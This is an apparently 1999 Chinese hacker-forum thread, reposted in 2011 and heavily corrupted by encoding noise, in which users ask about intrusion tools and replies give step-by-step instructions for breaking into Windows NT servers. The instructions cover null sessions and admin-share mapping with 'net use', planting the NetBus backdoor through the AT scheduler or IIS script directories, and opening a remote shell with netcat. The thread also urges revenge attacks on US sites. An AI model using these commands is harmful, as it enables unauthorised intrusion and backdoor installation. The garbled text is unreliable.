《版主頁黑客工具和文章的幾個(gè)問題》中提到:
% @2 \ }# K& a. A' ?% p請(qǐng)教��,從版主頁上載得PINGER�,GRINDER��,LETMEIN等,卻不能用����,PINGER安裝后,明明安裝前文件有1M多���,但安裝完后生成的文件夾中只有PINGER�����。EXE�,40多K���,運(yùn)行PINGER���,設(shè)置好IP,點(diǎn)PING�,彈出一個(gè)窗口(C++。���。����。),說出錯(cuò)��,然后關(guān)閉了��,何故�����,是不是安裝有誤��? 2��。運(yùn)行LETMEIN�,彈出以下錯(cuò)誤:連接文件LETMEIN����。EXE到不存在的NETAPI32。DLL��;NETGROUPGETUSERS���。 是否說明需要NETAPI32�����。DLL文件�����,哪里有該DLL�����。 3�。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等���,是否要求我的操作系統(tǒng)也是WINNT4�。0 ���,應(yīng)該不是吧�����? 4�。NC FOR NT 是否要求我的操作系統(tǒng)為NT�����,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答����,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦�, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章,以提高我國黑客水平��。. j+ v) \- B5 [$ p' c/ R/ k0 z
> 我的機(jī)子MMX166�����,WIN98�,2��。5G�����,32M內(nèi)存���。, q& [5 D! _9 a& }4 h$ t# w5 Y: p, p
9 ]5 N$ v* W( v; n8 M1 Z9 e" C3 l
黑客并不神秘����,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)��,輔助相關(guān)的工具����,就可以成功。
3 G5 J4 D. X1 M' L你的問題是�,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議��,你一定要安裝NT�����,對(duì)于你的機(jī)器配制�����,和我們現(xiàn)在差不多�����,只是比你多了32M內(nèi)存�,2G硬盤。8 s, a7 a! y5 Z) @9 L( b
其實(shí)�����,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了���,比如��,我們?cè)贜T上攻擊某服務(wù)器�,該服務(wù)器為NT4.0�,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111��,做法如下:1 E& t+ E7 L' F2 z0 P* e# F
net use \\111.111.111.111\ipc$ "" /user:"", A4 V$ F& s; P5 s. `! ?
net.exe是NT的工具文件����,該命令將和目標(biāo)服務(wù)器建立Null Session��,如果成功�����,你可以查看該服務(wù)器上的共享目錄:
9 R8 @ X0 C) @0 Mnet view \\111.111.111.111, E+ L5 f0 P3 p) b! u
當(dāng)然����,如果你有該NT管理員密碼����,就更好辦了��,假設(shè)其管理員Admin密碼為fuck:
8 C( A: w& r9 D" x% i! h4 Lnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin". I1 H0 T# O; N1 ^9 r
命令成功后�����,幾乎所有目標(biāo)NT上的配制����,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:+ b( ~6 O3 T3 l K1 r" }- J! w" a
1�、查看或修改遠(yuǎn)程機(jī)器上的硬盤,假如目標(biāo)NT上有C��、D兩個(gè)硬盤:
: _# l4 e. m$ Mnet use x: \\111.111.111.111\c$
- o3 P! `( J& J0 }* Ynet use y: \\111.111.111.111\d$
# o- Z: K( u: D3 D" a1 k這樣�����,目標(biāo)NT上的C��、D盤分別被影射為你本地的X��、Y盤,你想怎么做都可以...
z8 A3 k) D% g% c2�����、管理目標(biāo)NT的用戶:
( ?& P: l7 B3 P4 o9 U& S從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”0 V' X9 F7 E. Y
鍵入\\111.111.111.111后���,目標(biāo)NT上的所有用戶你想怎么做都可以����,和管理你本地的一樣" ]' ]' D+ P; y5 Y& M
3���、管理目標(biāo)NT的服務(wù)
}9 a1 x2 k( k+ q, g( z* a選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”& p3 b; n, ^, v. B/ x1 v% W) N
這樣你可以管理目標(biāo)NT上的服務(wù)���,共享目錄
. f% F5 U& H+ U2 ]3 P+ o4、IIS管理! D! F$ b* S& X
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
1 g- Z) i1 J. C0 N6 R8 d+ g) @目標(biāo)NT的FTP���、WWW服務(wù)你就可以重新配置
8 y' ^: T/ E0 J1 }& x2 T5、事件管理9 h; Y2 r4 s' Q, u5 }
“事件查看器”->連接到服務(wù)器->111.111.111.111/ U6 X8 z [3 h' s
1 y" t9 {9 k9 b' B+ ]: S; c
還有更多的東西�����,都可以用NT本身的功能來完成���,這些都是95, 98所不能實(shí)現(xiàn)的�。
9 [9 {# H6 C) x3 s& E; R* \" |
6 v- T' @# e+ v! }- r! v1 g, `0 A當(dāng)然,98,95也能做一些事情����,但很麻煩,比如:
) ^& X( m% [# [ y1 N9 qnet use \\111.111.111.111\ipc$4 ^) S# W6 M) Q% L; M1 j; t
net use z: \\111.111.111.111\d$# V- |) b& s1 G- C1 d9 R X
但其后不能帶參數(shù)���,即改用其他用戶或密碼����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄��,如果你知道目標(biāo)NT的用戶或密碼�����,重新啟動(dòng)95, 98��,改用該用戶和密碼登錄�,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源��,但不能進(jìn)行管理�����,如用戶、事件等, s8 |$ G0 ~5 G+ Z$ |( X
+ g3 m7 {+ j; R
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇��,真正的想黑霉國的站點(diǎn)����,花點(diǎn)時(shí)間,裝個(gè)NT吧�����,NT Workstation也可以�!
; U U7 V3 z3 j% N- s$ H這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用��!9 @- y, f0 H& @' U& \& k& _6 ]
* q J1 S" E% q2 V1 }
8 }2 S$ D/ b! c0 r, S0 q--------------------------------------------------------------------------------3 t7 `; U$ v8 D. w% x
, N$ j% h/ [4 y8 b8 o
>quack于1999-06-12�,23:37:44* y: W+ s/ b- |$ @$ r- v
在大作《幾個(gè)有關(guān)黑的問題》中提到:6 s+ V3 q% g: p3 V% t7 `+ K1 d# E
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國人,哈!。
; g G! b& z( X* X6 y) X0 Z
# H( X0 s# [9 J8 wkillusa于1999-06-13����,03:25:15
% A2 l0 ^3 {1 b: d& s6 j' c1 f. n在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:2 d$ A* E9 [7 { l9 K7 e) u
( ~: [2 K4 ~" ` J) Fletmein.exe 暫時(shí)沒有mypwd參數(shù),十分抱歉
* N' K; a$ R q! `pinger程序��,只是利用ping來尋找主機(jī)����,每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址�,比如有些服務(wù)器供應(yīng)商,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP�,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址�,所以有時(shí)顯示只有IP,而無主機(jī)名��。另外���,有些服務(wù)器是非NT的操作系統(tǒng)���,有時(shí)將不會(huì)顯示主機(jī)名。當(dāng)然�,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置,也會(huì)出現(xiàn)上面的情況�。$ V& w( M2 U# b4 c6 J
9 \# f) r. Y" b/ A# |: b
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以��,netbus.exe是不用上傳的�,只需在目的
0 `- V' A/ F% g1 u服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:+ a3 ^$ v6 e+ `2 m6 w
" `% l3 E2 c) G8 a( C4 U' U
1��、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法�����,可在自己的NT Dos窗口下鍵入以下:5 d1 V$ c' v7 S B
9 P( r q# S& u: }1 f$ t! ~
C:\>net start schedule1 D8 ]1 T8 o" Z0 @* r A0 d8 M0 |! x
Schedule 正在啟動(dòng)服務(wù).....4 l% a1 q1 x6 Z+ n3 B2 J( Y$ v
Schedulw 服務(wù)啟動(dòng)成功��。
9 J2 A6 d6 g- [$ J# mC:\>at /?# G2 r+ }# n! J, w* u# p5 N
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序���。
/ l2 P) T/ h! q- F i- b運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)�。5 i2 b4 r/ H! W! m7 Y, A h4 V& G
$ a c5 ]( S5 ~% N
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
2 o( ?) E y+ q, Y" l- p% SAT [\\computername] time [/INTERACTIVE]
9 ]+ W1 a" H" \( ~[ /EVERY:date[,...] | /NEXT:date[,...]] "command"& D/ C% @8 z; ]: P; X8 d* Z7 G
: S2 s# I1 Y/ w2 B1 Y) E4 Y5 c7 w\\computername 指定遠(yuǎn)程計(jì)算機(jī)�。 如果省略這個(gè)參數(shù)
( F# U+ e% ~7 b0 q/ r命令會(huì)被排定在本機(jī)上運(yùn)行。
& }$ @1 s0 q3 ~) i# @6 Y. sid 指定給排定進(jìn)度命令的識(shí)別號(hào)��。5 C+ k! R. R' U" u) O
0 P( c* z7 I) N
/delete 刪除某個(gè)已排定進(jìn)度的命令��。如果省略標(biāo)識(shí)�����,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除���。$ K2 a! p* @9 R$ W) Z
/yes 用于刪除所有作業(yè)�,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ����。
6 x$ c. Q0 E5 d) Dtime 指定命令運(yùn)行的時(shí)間。
9 q. J* S; Z$ \; i: U! X/interactive 允許作業(yè)在運(yùn)行時(shí)����,與用戶通過桌面交互。
; a$ | a& w7 p8 a1 B4 A, g; G& S/ g( A8 o
4 e9 s. v$ [/ ~/ H# ?4 q2 c8 D/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令�。
9 @0 ^0 l+ W8 Z如果省略日期,則默認(rèn)為在每月的本日運(yùn)行����。
" {' h1 e0 ^7 C0 q! r( n) N6 C8 q; p
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三)����,運(yùn)行命令。如果省略日期�����,則默認(rèn)為在每月的本日運(yùn)行���。
5 ]/ ]3 a0 D6 Z' h0 O# h8 A: Y ^& P/ y3 L- d5 m
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�����。6 y& U# H) q P) s" A- F
( s, s6 v( ^* g
C:\>
7 U- _3 @7 ^$ z% p$ u8 [: E8 [6 y" L4 M% {
知道了如何使用AT�,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
& q& B4 m. Z4 W6 F% ?. }1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"7 H" ]& m# b( d& d8 i
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start& g% e6 P; _3 W% N1 |6 q! y. ?" X
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行��,當(dāng)然最快運(yùn)行最理想�����,所以�����,你可以用letmein.exe得到服務(wù)器的時(shí)間�����,然后:
2 O% p! ^$ k/ Y: p; Eat \\x.x.x.x 00:00 ntsrv.exe /port:64321
+ p+ h* W8 K; V h, O其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量�,等一會(huì)后,再在本地啟動(dòng)netbus.exe����,鍵入目的服務(wù)器得ip地址或hostname,連接���!具體使用可參照 "How to get in nt"�����,比如第一種方法����,你想要在目的服務(wù)器運(yùn)行 LEGION��,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器��,再用netbus的"Start program"���,鍵入完整路徑的LEGION運(yùn)行程序���,就ok了!第二種方法是利用netbus的“App redirect”功能����,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”���,鍵入"C:\>winnt\system32\cmd.exe"��,Port為:4321���,服務(wù)就啟動(dòng)了�����,然后在本地運(yùn)行:nc x.x.x.x 4321�,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
4 ]( }2 u n7 M; z% ?4 u! j$ gMicrosoft(R) Windows NT(TM)
0 A; P3 u: `/ c" X5 Z(C) Copyright 1985-1996 Microsoft Corp.
6 S- Y v9 L6 T( ~1 @C:\>
5 x$ a) f! b, c+ _. ~' g: R$ h# f3 V1 J/ ~0 J
2��、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器3 ~9 i/ N% ^. x9 H* e
# T5 \! }6 m {將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄���,如cgi-bin或scripts��,然后在瀏覽器鍵入url如:/ V& g/ ~/ i/ s8 q
http://x.x.x.x/scripts/ntsrv.exe /port:64321
* Y4 r2 H; A% H2 c" G, k或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321+ k" H: h: q( \8 |4 l( s
該程序就啟動(dòng)了: _+ Z$ i0 t6 Y q1 j, T8 n" e2 ^
2 u: v' o3 y! r, Z; K+ @4 G' C我只提這幾中方法�!9 z3 X" w5 f8 h5 D
要成功���,必須打好基礎(chǔ)工�����,對(duì)操作系統(tǒng)充分了解!. |: U w' \# @6 E1 Y. ^
, p5 v9 Q( \8 `2 [6 v+ D
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡